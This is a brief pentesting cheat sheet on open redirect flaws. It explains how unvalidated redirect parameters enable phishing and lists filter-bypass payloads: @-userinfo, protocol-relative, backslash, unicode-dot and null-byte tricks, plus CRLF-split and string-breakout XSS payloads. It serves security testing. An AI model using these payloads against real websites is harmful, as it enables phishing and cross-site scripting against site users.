# Open Redirect

### Overview

A website is vulnerable to open redirect when a parameter value (the portion of the URL after "?") in an HTTP GET request is used as the target of a redirect without proper validation of where that target points. Depending on the architecture of the vulnerable website, the redirect may happen after a certain action, such as login, or it may happen immediately when a page loads.

An example of a vulnerable website link could look something like this: `https://www.example.com/login.html?RelayState=http%3A%2F%2Fexample.com%2Fnext`

This makes **phishing** really easy: the link carries the trusted domain, but the victim ends up on your own site, where you ask for a login.

### Exploiting Semi-Hardcoded Paths

If the redirection is done like this:

```js
// The attacker-controlled value is appended to a fixed prefix before the redirect
window.location.href = hardcoded_part + malicious_part;
```

Then you might still be able to redirect to your own site using the `@` sign (whether this works depends on the hardcoded part).

Tests:

* `http://example.com@test.com`
  * Works in Chrome
  * Works in Firefox, but Firefox shows a phishing warning
* `http://example.com/page@test.com`
  * Doesn't work
* `page@test.com`
  * Doesn't work

### Filter Bypassing

Here are some things to try when a filter blocks the obvious payload but an open redirect may still be reachable:

* `java%0d%0ascript%0d%0a:alert(0)`
  * CRLF injection: browsers strip CR/LF characters from the scheme, so this defeats a blacklist that looks for the literal string `javascript:`
  * Results in **XSS**
* `//google.com`
  * In case `http://` is blacklisted
* `https:google.com`
  * Browsers accept this; useful if `//` is blacklisted
* `//google%E3%80%82com`
  * `%E3%80%82` is the URL encoding of `。` (U+3002), which browsers map to an ASCII `.` when parsing the host
* `\/\/google.com/`
  * Useful for bypassing `//` and `http://` blacklists: browsers treat `\/\/` as `//`
* `/\/google.com/`
  * Same as above
* `//google%00.com`
  * Attempt to use a null byte to bypass a blacklist filter
* `http://www.theirsite.com@yoursite.com/`
  * Browsers treat everything before `@` as userinfo and connect to the host after it
* `http://www.yoursite.com/http://www.theirsite.com/`
  * If `@` is blacklisted and the filter only checks that their domain appears somewhere in the parameter, create a folder on your site named after their domain
* `";alert(0);//`
  * If the URL is echoed into a JavaScript variable inside a `<script>` tag, this breaks out of the string and gives XSS
